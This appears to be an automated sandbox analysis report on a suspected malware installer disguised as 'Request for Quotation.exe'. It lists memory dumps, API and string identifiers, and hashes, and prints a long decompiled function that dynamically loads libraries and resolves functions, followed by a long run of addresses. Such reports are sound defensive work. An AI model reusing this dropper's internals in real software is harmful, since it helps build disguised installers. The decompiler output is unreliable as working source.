                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                • String ID: "$"C:\Users\user\Desktop\Request for Quotation.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 538718688-3571868795
                                                                                • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F711A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E6F711A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E6F711215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E6F711215();
				_t320 = E6F71123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E6F7112FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E6F711534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x6f712259) & 0x000000ff) * 4 +  &M6F7121CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E6F711224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E6F711215();
											 &_v12 = E6F711A36( &_v12);
											__eax = E6F711429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6F711A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6F711A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6f71305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6F711A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E6F7115C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E6F7112FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E6F7115C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E6F7112FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E6F7112FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E6F7112FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E6F711224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E6F7112FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                0x6f711aa0
                                                                                0x6f711aa3
                                                                                0x6f711aa6
                                                                                0x6f711aa9
                                                                                0x6f711aac
                                                                                0x6f711aaf
                                                                                0x6f711ab2
                                                                                0x6f711ab4
                                                                                0x6f711ab7
                                                                                0x6f711aba
                                                                                0x6f711abf
                                                                                0x6f711ac2
                                                                                0x6f711aca
                                                                                0x6f711ad2
                                                                                0x6f711ad4
                                                                                0x6f711ad7
                                                                                0x6f711adf
                                                                                0x6f711adf
                                                                                0x6f711ae4
                                                                                0x6f711ae7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711af1
                                                                                0x6f711af3
                                                                                0x6f711af8
                                                                                0x6f711afa
                                                                                0x6f711b8b
                                                                                0x6f711b8b
                                                                                0x6f711b8b
                                                                                0x6f711b8f
                                                                                0x6f711b92
                                                                                0x6f711b94
                                                                                0x6f711bb6
                                                                                0x6f711bb9
                                                                                0x6f711bbb
                                                                                0x6f711bc4
                                                                                0x6f711bca
                                                                                0x6f711bcc
                                                                                0x6f711bd2
                                                                                0x6f711bd2
                                                                                0x6f711bd8
                                                                                0x6f711bdb
                                                                                0x6f711bdb
                                                                                0x6f711bde
                                                                                0x6f711bde
                                                                                0x6f711be4
                                                                                0x6f711be6
                                                                                0x6f711be9
                                                                                0x6f711bef
                                                                                0x6f711bf2
                                                                                0x6f711bf2
                                                                                0x6f711bf4
                                                                                0x6f711bfa
                                                                                0x6f711bfd
                                                                                0x6f711c21
                                                                                0x6f711c24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c27
                                                                                0x6f711c29
                                                                                0x6f711c37
                                                                                0x6f711c3a
                                                                                0x6f711c3c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c3e
                                                                                0x6f711c3e
                                                                                0x6f711c3e
                                                                                0x6f711c44
                                                                                0x6f711c46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c48
                                                                                0x6f711c4a
                                                                                0x6f711c4c
                                                                                0x6f711c4e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c4e
                                                                                0x6f711c50
                                                                                0x6f711c52
                                                                                0x6f711c54
                                                                                0x6f711c54
                                                                                0x6f711c5a
                                                                                0x6f711c60
                                                                                0x6f711c62
                                                                                0x6f711c76
                                                                                0x6f711c76
                                                                                0x6f711c78
                                                                                0x6f711c64
                                                                                0x6f711c6a
                                                                                0x6f711c6d
                                                                                0x6f711c6d
                                                                                0x00000000
                                                                                0x6f711bff
                                                                                0x6f711bff
                                                                                0x6f711bff
                                                                                0x6f711c00
                                                                                0x6f711c08
                                                                                0x6f711c0c
                                                                                0x6f711c12
                                                                                0x6f711c16
                                                                                0x00000000
                                                                                0x6f711c16
                                                                                0x6f711c02
                                                                                0x6f711c02
                                                                                0x6f711c03
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c05
                                                                                0x6f711c06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711c06
                                                                                0x6f711b96
                                                                                0x6f711b97
                                                                                0x6f711ba0
                                                                                0x6f711ba3
                                                                                0x6f711bb0
                                                                                0x6f711bb0
                                                                                0x6f711ba5
                                                                                0x6f711ba5
                                                                                0x6f711c7e
                                                                                0x6f711c81
                                                                                0x6f711c84
                                                                                0x6f711cf6
                                                                                0x6f711cfa
                                                                                0x6f711adc
                                                                                0x00000000
                                                                                0x6f711adc
                                                                                0x00000000
                                                                                0x6f711cfa
                                                                                0x6f711b94
                                                                                0x6f711b00
                                                                                0x6f711b03
                                                                                0x6f711b66
                                                                                0x6f711b69
                                                                                0x6f711b7a
                                                                                0x6f711b7a
                                                                                0x6f711b7d
                                                                                0x6f711c89
                                                                                0x6f711c8c
                                                                                0x6f711c8c
                                                                                0x6f711c8e
                                                                                0x6f712033
                                                                                0x6f712045
                                                                                0x6f712045
                                                                                0x6f712047
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712037
                                                                                0x6f712038
                                                                                0x6f71203b
                                                                                0x6f71203e
                                                                                0x6f7120ba
                                                                                0x6f7120c1
                                                                                0x6f7120c6
                                                                                0x6f7120c9
                                                                                0x6f711cf2
                                                                                0x6f711cf2
                                                                                0x6f711cf2
                                                                                0x6f711cf3
                                                                                0x00000000
                                                                                0x6f711cf3
                                                                                0x6f712040
                                                                                0x6f712042
                                                                                0x6f712042
                                                                                0x6f712049
                                                                                0x6f71204b
                                                                                0x6f7120ae
                                                                                0x6f711ce7
                                                                                0x6f711cea
                                                                                0x6f711ced
                                                                                0x6f711cf0
                                                                                0x6f711cf0
                                                                                0x00000000
                                                                                0x6f711cf0
                                                                                0x6f71204d
                                                                                0x6f71204f
                                                                                0x6f712055
                                                                                0x6f712055
                                                                                0x6f712057
                                                                                0x6f71205a
                                                                                0x6f71206d
                                                                                0x6f71206d
                                                                                0x6f712070
                                                                                0x6f712073
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712075
                                                                                0x6f712078
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71207a
                                                                                0x6f712081
                                                                                0x6f712081
                                                                                0x6f712087
                                                                                0x6f71208a
                                                                                0x6f7120a6
                                                                                0x6f71208c
                                                                                0x6f712095
                                                                                0x6f712098
                                                                                0x6f712098
                                                                                0x00000000
                                                                                0x6f71208a
                                                                                0x6f71205c
                                                                                0x6f71205f
                                                                                0x6f712062
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712064
                                                                                0x00000000
                                                                                0x6f712064
                                                                                0x6f712051
                                                                                0x6f712053
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712053
                                                                                0x6f711c94
                                                                                0x6f711c94
                                                                                0x6f711c95
                                                                                0x6f711dde
                                                                                0x6f711dde
                                                                                0x6f711de5
                                                                                0x6f711de8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711df5
                                                                                0x00000000
                                                                                0x6f711fdb
                                                                                0x6f711fde
                                                                                0x6f711fe1
                                                                                0x6f711fe1
                                                                                0x6f711fe2
                                                                                0x6f711fe5
                                                                                0x6f711fe7
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711feb
                                                                                0x6f711feb
                                                                                0x6f711fee
                                                                                0x6f712000
                                                                                0x6f712003
                                                                                0x6f712006
                                                                                0x6f71200c
                                                                                0x00000000
                                                                                0x6f71200c
                                                                                0x6f711ff0
                                                                                0x6f711ff0
                                                                                0x6f711ff2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ff4
                                                                                0x6f711ff6
                                                                                0x6f711ff8
                                                                                0x6f711ff8
                                                                                0x6f711ff8
                                                                                0x6f711ff9
                                                                                0x6f711ffb
                                                                                0x6f711ffd
                                                                                0x6f711fe1
                                                                                0x6f711fe2
                                                                                0x6f711fe5
                                                                                0x6f711fe7
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x6f711e3c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e48
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e2f
                                                                                0x6f711e33
                                                                                0x6f711e37
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fad
                                                                                0x6f711fb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fb7
                                                                                0x6f711fbf
                                                                                0x6f711fc6
                                                                                0x6f711fce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f15
                                                                                0x6f711f15
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e51
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71202b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f1d
                                                                                0x6f711f1f
                                                                                0x6f711f1f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71201b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71201f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712027
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f64
                                                                                0x6f711f66
                                                                                0x6f711f66
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f2f
                                                                                0x6f711f31
                                                                                0x6f711f31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f41
                                                                                0x6f711f43
                                                                                0x6f711f43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f72
                                                                                0x6f711f74
                                                                                0x6f711f74
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f4c
                                                                                0x6f711f4e
                                                                                0x6f711f4e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f53
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712023
                                                                                0x6f71202d
                                                                                0x6f71202d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f7d
                                                                                0x6f711f81
                                                                                0x6f711f86
                                                                                0x6f711f89
                                                                                0x6f711f8a
                                                                                0x6f711f8d
                                                                                0x6f711f93
                                                                                0x6f711f93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712013
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f57
                                                                                0x6f711f57
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e58
                                                                                0x6f711e58
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f6b
                                                                                0x6f711f6d
